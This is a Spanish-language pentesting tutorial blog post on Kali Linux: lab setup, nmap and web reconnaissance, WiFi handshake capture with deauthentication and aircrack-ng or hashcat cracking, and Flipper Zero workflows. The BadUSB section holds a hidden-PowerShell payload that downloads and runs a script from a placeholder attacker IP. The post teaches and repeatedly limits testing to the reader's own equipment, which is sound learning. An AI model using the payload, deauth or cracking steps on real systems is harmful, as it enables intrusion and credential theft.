Menú
Sobre mí Servicios Trayectoria Trabaja conmigo
Linux terminal with code
Seguridad 7 Mar, 2026 • 25 min de lectura

Fundamentos de Kali Linux: Construye tu Laboratorio de Hacking

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

Compartir:
Lee Foropoulos

Lee Foropoulos

25 min de lectura

El Camino del Hacker: Una Serie de 5 Partes

Parte 1: IntroduccionParte 2: Dominio del FlipperParte 3: Fundamentos de KaliParte 4: ExplotacionParte 5: La Auditoria Completa

En las Partes 1 y 2, clonaste tarjetas, analizaste frecuencias de radio y entendiste por que la mayoria de la "seguridad" es teatro. Has visto las vulnerabilidades desde afuera. Ahora entras y las ves desde la perspectiva del atacante.

Kali Linux es la distribucion estandar de la industria para pruebas de penetracion. Viene precargada con mas de 600 herramientas de seguridad. Esto puede parecer abrumador. La mayoria de los tutoriales te lanzan a lo profundo con comandos que no entiendes y sin contexto de por que importan.

Nosotros lo hacemos diferente. Al final de este articulo, tendras un laboratorio funcionando, entenderas el reconocimiento de redes a nivel fundamental y capturaras tu propio handshake WiFi. Cada paso se construye sobre el anterior.

La mayoria de los tutoriales te lanzan a lo profundo con comandos que no entiendes y sin contexto de por que importan. Aqui cada paso se construye sobre el anterior.

Parte 1: Construyendo Tu Laboratorio

Los pentesters profesionales no ejecutan Kali en su maquina principal. Usan entornos aislados que se pueden reiniciar, capturar en snapshots y destruir sin afectar su sistema principal. Tu haras lo mismo.

Opcion A: Maquina Virtual (Recomendada para Aprender)

Una maquina virtual te da el entorno de aprendizaje mas seguro. Puedes hacer snapshots de tu progreso, cometer errores y revertir al instante.

Lo Que Necesitaras

  • Maquina host: 16GB+ RAM, 50GB+ de espacio libre en disco, CPU moderna con soporte de virtualizacion
  • Software de virtualizacion: VirtualBox (gratuito) o VMware Workstation Player (gratuito para uso personal)
  • Kali Linux: VM oficial preconstruida desde kali.org

Proyecto: Configuracion de la VM de Kali

Tiempo: 30-45 minutos

Pasos:

  1. Descarga la imagen de la VM de Kali para tu hypervisor (VirtualBox o VMware)
  2. Extrae el archivo descargado (se recomienda 7-Zip para Windows)
  3. Importa la VM en tu hypervisor
  4. Configura los recursos: 4GB de RAM minimo (8GB recomendado), 2+ nucleos de CPU
  5. Habilita el adaptador de red en modo "Bridged" para acceso completo a la red
  6. Inicia la VM e inicia sesion con las credenciales por defecto: kali / kali
  7. Abre la terminal y ejecuta: sudo apt update && sudo apt full-upgrade -y
  8. Crea un snapshot llamado "Fresh Install" para recuperacion facil

Verificar exito: Puedes abrir una terminal, ejecutar whoami y ver kali.

Opcion B: Hardware Dedicado (Para Practica Seria)

Una vez que te sientas comodo con Kali, el hardware dedicado elimina la sobrecarga de la VM y habilita acceso completo al hardware, lo cual es esencial para pruebas inalambricas.

Recomendaciones de Hardware

Opcion economicaThinkPad X230/T430 usado ($100-150), WiFi Intel reemplazado con Atheros AR9285
Opcion modernaFramework Laptop con modulo WiFi compatible con Linux
Sensor dedicadoRaspberry Pi 5 4GB con adaptador externo Alfa AWUS036ACH

Por ahora, una VM es perfecta. El hardware dedicado se vuelve importante cuando necesitas modo monitor para pruebas inalambricas (cubierto mas adelante en este articulo).

Opcion C: USB Live (Cero Persistencia)

Un USB live ejecuta Kali directamente sin instalacion. Todo desaparece cuando apagas. Util para probar en diferentes hardware, pero perderas tu trabajo cada sesion a menos que crees una particion persistente.

bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcher

dd Destruye Datos

El comando dd escribe directamente en el disco sin confirmacion. Verifica tres veces el nombre de tu dispositivo. Escribir en el dispositivo equivocado borrara esa unidad completamente.

Kali Linux terminal with security tools running
Un entorno de Kali Linux correctamente configurado es la base de toda prueba de penetracion profesional.

Parte 2: La Mentalidad de Terminal

Antes de tocar herramientas de seguridad, necesitas sentirte comodo en la terminal. Esto no es opcional. La GUI existe en Kali, pero el trabajo real sucede en la linea de comandos.

bash# Know where you are
pwd                    # Print working directory

# Move around
cd /home/kali          # Go to home directory
cd ..                  # Go up one level
cd -                   # Go to previous directory

# See what's here
ls                     # List files
ls -la                 # List all files with details
ls -lah                # Human-readable sizes

# Read files
cat filename           # Display entire file
less filename          # Scrollable view (q to quit)
head -n 20 filename    # First 20 lines
tail -f filename       # Follow file in real-time (logs)

Escalada de Privilegios

Muchas herramientas de seguridad requieren acceso root. En Kali, sudo te da privilegios root temporales.

bashsudo command           # Run single command as root
sudo -i                # Start root shell (be careful)
whoami                 # Check current user
id                     # Show user and group IDs

Root con Responsabilidad

Ejecutar como root significa sin redes de seguridad. Un error tipografico como rm -rf / destruira todo. Kali moderno previene este comando especifico, pero el principio se mantiene: entiende lo que estas ejecutando antes de ejecutarlo.

Gestion de Procesos

bashps aux                 # All running processes
top                    # Real-time process viewer
htop                   # Better process viewer (install if needed)

# Control processes
ctrl+c                 # Stop current process
ctrl+z                 # Suspend process
bg                     # Resume in background
fg                     # Bring to foreground

# Kill processes
kill PID               # Graceful termination
kill -9 PID            # Force kill (last resort)

Comandos de Red

baship a                   # Show network interfaces
ip route               # Show routing table
ping -c 4 8.8.8.8     # Test connectivity
curl ifconfig.me       # Your public IP

# DNS lookups
nslookup google.com
dig google.com

Proyecto: Orientacion en la Terminal

Tiempo: 15 minutos

Tareas:

  1. Encuentra tu direccion IP en la red local usando ip a
  2. Identifica tu puerta de enlace predeterminada usando ip route
  3. Haz ping a tu puerta de enlace para confirmar conectividad
  4. Lista todos los archivos en /etc ordenados por tiempo de modificacion: ls -lt /etc | head
  5. Lee las primeras 50 lineas de /etc/passwd: head -n 50 /etc/passwd

Objetivo: Deberias poder navegar, verificar el estado de la red y leer archivos sin pensarlo.

Parte 3: Reconocimiento de Redes con Nmap

Nmap (Network Mapper) es la herramienta mas importante que aprenderas. Descubre hosts, identifica servicios, detecta sistemas operativos y mapea la topologia de red. Todo lo demas se construye sobre la salida de nmap.

Tu Primer Escaneo

Vamos a escanear tu propia red. Primero, identifica el rango de tu red:

bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255
bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24

# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnet

Veras una salida como:

textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)

Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

Ese primer escaneo te dice: "Estos dispositivos existen en mi red." Ahora hagamos preguntas mas profundas.

Deteccion de Servicios

Una vez que sabes que hosts existen, quieres saber que servicios estan ejecutando.

bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)

Salida comun:

textPORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1
80/tcp   open  http     nginx 1.18.0
443/tcp  open  ssl/http nginx 1.18.0

Deteccion de Sistema Operativo

bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1

# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1

Entendiendo los Estados de Puertos

Nmap reporta puertos en varios estados:

  • open - La aplicacion esta aceptando conexiones activamente. Esto es lo que buscan los atacantes.
  • closed - El puerto es accesible pero ninguna aplicacion esta escuchando. El host esta activo pero no hay nada alli.
  • filtered - Un firewall o filtro bloquea la sonda. No se puede determinar si esta abierto o cerrado.
  • unfiltered - El puerto es accesible pero nmap no puede determinar si esta abierto o cerrado.

Tipos de Escaneo y Sigilo

bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target

# SYN scan (stealthier, default with root)
sudo nmap -sS target

# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target

# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target

# Scan specific ports
sudo nmap -p 22,80,443,8080 target

# Top 1000 common ports (default behavior)
sudo nmap target

Motor de Scripts de Nmap (NSE)

NSE extiende nmap con scripts especializados para deteccion de vulnerabilidades, enumeracion de servicios y mas.

bash# Run default safe scripts
sudo nmap -sC target

# Check for vulnerabilities
sudo nmap --script vuln target

# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target

# HTTP enumeration
sudo nmap --script http-enum target

# List available scripts
ls /usr/share/nmap/scripts/ | head -20

Proyecto: Mapea Tu Red

Tiempo: 30 minutos

Prerequisitos: Conocer el rango de tu red desde ip a

  1. Descubre todos los hosts: sudo nmap -sn TU_RED/24
  2. Lista los hosts descubiertos y sus direcciones MAC
  3. Elige tu router (generalmente .1) y ejecuta: sudo nmap -sV -sC TU_ROUTER
  4. Identifica todos los puertos abiertos y servicios en tu router
  5. Ejecuta sudo nmap -A TU_COMPUTADORA para ver que expone tu propia maquina

Documenta: Crea un archivo de texto listando cada dispositivo, su IP, MAC y servicios. Este es tu mapa de red.

Solo Escanea Redes Que Te Pertenecen

Escanear redes sin autorizacion es ilegal en la mayoria de las jurisdicciones. Incluso un escaneo simple de nmap puede considerarse acceso no autorizado. Limitante a tu propia red, tu propio equipo y redes donde tengas permiso escrito explicito.

Parte 4: Reconocimiento Web

Tu escaneo de nmap probablemente encontro servicios HTTP (puertos 80, 443, 8080). Vamos a entender que se esta ejecutando alli.

Whatweb: Identificacion Rapida de Servicios

bash# Identify web technologies
whatweb http://192.168.1.1

Ejemplo de salida:

texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]

Nikto: Escaner de Vulnerabilidades Web

bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1

# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentials

Enumeracion de Directorios: Que Esta Oculto?

Los servidores web frecuentemente tienen directorios no enlazados desde la pagina principal: paneles de administracion, archivos de configuracion, archivos de respaldo.

bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

Hallazgos comunes:

text/admin   (Status: 301)
/backup  (Status: 403)
/config  (Status: 200)
/login   (Status: 200)

Ubicacion de Wordlists

Kali incluye extensas wordlists en /usr/share/wordlists/. Los directorios mas comunes: dirb/, dirbuster/, rockyou.txt (contrasenas) y seclists/ (coleccion completa).

Proyecto: Audita la Interfaz Web de Tu Router

Tiempo: 20 minutos

  1. Ejecuta whatweb http://IP_DE_TU_ROUTER para identificar el servidor
  2. Ejecuta nikto -h http://IP_DE_TU_ROUTER para buscar vulnerabilidades
  3. Ejecuta gobuster dir -u http://IP_DE_TU_ROUTER -w /usr/share/wordlists/dirb/small.txt
  4. Visita cualquier directorio descubierto en un navegador
  5. Anota cualquier panel de administracion, numeros de version o hallazgos interesantes

Hallazgo comun: Paginas de administracion del router expuestas con credenciales por defecto.

Server room with network infrastructure
El reconocimiento de red revela la topologia completa de un entorno objetivo, desde routers hasta servicios ocultos.

Parte 5: Reconocimiento Inalambrico

Aqui es donde las cosas se ponen interesantes. Las redes WiFi transmiten constantemente, y con las herramientas adecuadas, puedes capturar handshakes de autenticacion: el intercambio cifrado que ocurre cuando un dispositivo se conecta.

Requisitos de Hardware

Tu WiFi integrado probablemente no funcionara para esto. Necesitas un adaptador que soporte modo monitor e inyeccion de paquetes. Recomendados: Alfa AWUS036ACH ($50) o Alfa AWUS036ACM ($45). Estos funcionan directamente con Kali.

Entendiendo el Modo Monitor

El modo WiFi normal ("modo gestionado") solo recibe paquetes dirigidos a tu dispositivo. El modo monitor captura todos los paquetes en rango, el trafico de cada dispositivo en el canal.

bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0mon

Escaneando Redes

bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon

# You'll see:
# BSSID  = Router MAC address
# PWR    = Signal strength (higher = closer)
# CH     = Channel
# ENC    = Encryption (WPA2, WPA3, OPN)
# ESSID  = Network name

# Press Ctrl+C to stop

Lo que estas viendo es cada red WiFi en rango, sus configuraciones de seguridad, y frecuentemente los dispositivos conectados a ellas. Esto es lo que un war driver ve cuando escanea vecindarios.

Capturando un Handshake

Cuando un dispositivo se conecta a una red WPA2, hay un handshake de cuatro vias. Si capturas este handshake, puedes intentar crackear la contrasena offline.

bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"

# Now wait for a device to connect...

# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshake

Cuando capturas un handshake, airodump-ng muestra [ WPA handshake: XX:XX:XX:XX:XX:XX ] en la esquina superior derecha.

Los Ataques Deauth Son Ilegales

Enviar paquetes de deautenticacion a redes que no te pertenecen es un delito federal bajo la Computer Fraud and Abuse Act (en EE.UU.) y leyes similares en otros paises. Solo prueba en tu propia red. El objetivo es entender la vulnerabilidad, no atacar a otros.

Crackeando el Handshake

Con un handshake capturado, puedes intentar crackear la contrasena offline usando una wordlist:

bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]

# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx

# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
Contrasenas reales de filtraciones de datos reales estan incluidas en rockyou.txt, la wordlist predeterminada usada para crackear handshakes WiFi capturados.

Verificacion de Realidad sobre la Fortaleza de Contrasenas

rockyou.txt contiene mas de 14 millones de contrasenas de filtraciones de datos reales. Si tu contrasena WiFi es "password123" o "verano2024" o el nombre de tu perro, se puede crackear en segundos. Una contrasena aleatoria de mas de 12 caracteres tomaria millones de anos en ser crackeada por fuerza bruta.

Proyecto: Prueba la Seguridad de Tu WiFi

Tiempo: 45 minutos

Prerequisitos: Adaptador WiFi externo con soporte de modo monitor

  1. Habilita el modo monitor: sudo airmon-ng start wlan0
  2. Escanea redes: sudo airodump-ng wlan0mon
  3. Anota el canal y BSSID de tu propia red
  4. Captura en tu canal: sudo airodump-ng -c CHANNEL --bssid TU_BSSID -w miwifi wlan0mon
  5. Reconecta un dispositivo a tu WiFi (o usa deauth en TU red)
  6. Confirma la captura del handshake
  7. Prueba contra rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt miwifi-01.cap

Resultado: Si tu contrasena fue encontrada, cambiala inmediatamente a algo aleatorio y largo (mas de 20 caracteres).

Parte 6: Conectando Tu Flipper Zero

Recuerdas todas esas capturas de la Parte 2? Vamos a integrarlas con tu flujo de trabajo en Kali.

Transfiriendo Archivos

bash# Connect Flipper via USB
# It appears as a mass storage device

# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper

# Your captures are in:
/mnt/flipper/subghz/       # Sub-GHz captures
/mnt/flipper/nfc/          # NFC dumps
/mnt/flipper/infrared/     # IR captures
/mnt/flipper/lfrfid/       # 125kHz RFID
/mnt/flipper/badusb/       # BadUSB scripts

Analizando Dumps NFC

bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk

# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd

# Analyze MIFARE Classic dump
hexdump -C card.mfd | less

Analisis Sub-GHz

bash# Flipper's .sub files are text-based
cat garage_door.sub

# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information

# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)

Desarrollo de BadUSB

Crea payloads BadUSB en Kali, pruebalos en el Flipper:

bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF

# Host the payload from Kali:
python3 -m http.server 8000

# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/

Los Payloads BadUSB Son Poderosos

Estos scripts se ejecutan automaticamente al conectarse. Un payload malicioso podria instalar backdoors, robar credenciales o destruir datos en segundos. Solo usalo en tus propias maquinas para pruebas. Nunca dejes tu Flipper donde alguien mas pueda conectarlo.

Parte 7: Documentacion y Flujo de Trabajo

Los pentesters profesionales no solo ejecutan herramientas. Documentan todo. La buena documentacion separa a los aficionados de los profesionales.

Toma de Notas con CherryTree

bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree

# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitation

Guardando la Salida de Nmap

bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target

# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml  (parseable)
# scan_results.gnmap (greppable)

Registro de Sesion

bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log

# Now every command and output is recorded
# Type 'exit' to stop logging

El Camino del Hacker

Una serie de 5 partes que te lleva de curioso a capaz.

Parte 1: Introduccion Parte 2: Dominio del Flipper Parte 3: Fundamentos de Kali ✓ Parte 4: Explotacion Parte 5: Auditoria Completa

Lista de Verificacion de la Parte 3

☐ Configuracion del Lab: VM de Kali funcionando, actualizada, snapshot guardado

☐ Terminal: Comodo con navegacion, permisos, control de procesos

☐ Nmap: Red mapeada, servicios identificados, router escaneado

☐ Recon Web: Interfaz web del router analizada con whatweb/nikto

☐ Inalambrico: Modo monitor habilitado, redes escaneadas

☐ Handshake: Handshake WiFi propio capturado y probado

☐ Flipper: Archivos transferidos, flujo de trabajo entendido

☐ Documentacion: Notas organizadas, escaneos guardados

Plan de Accion de Fundamentos de Kali 0/6

Que Sigue

Has construido tu laboratorio y aprendido la fase de reconocimiento. Puedes descubrir hosts, identificar servicios y capturar handshakes inalambricos. Entiendes lo que los atacantes ven cuando miran una red.

En la Parte 4, pasamos del reconocimiento a la explotacion. Aprenderas:

  • Metasploit Framework, la navaja suiza de la explotacion
  • Flujos de trabajo comunes de explotacion de vulnerabilidades
  • Tecnicas de post-explotacion: que sucede despues del acceso inicial
  • Escalada de privilegios: de usuario regular a administrador
  • Pivoting: usando un sistema comprometido para atacar otros

El reconocimiento te dice donde estan las puertas. La explotacion te ensena como atravesarlas.

Has mapeado el territorio. Ahora aprendes a navegarlo. La Parte 4 te lleva de observador a operador.

Nos vemos en la Parte 4.

How was this article?

Compartir

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

No te pierdas ninguna publicacion

Recibe notificaciones cuando se publiquen nuevos articulos. No se requiere correo electronico.

Veras un aviso en el sitio cuando haya una nueva publicacion, ademas de una notificacion del navegador si lo permites.

Solo notificaciones del navegador. Sin spam, sin correo.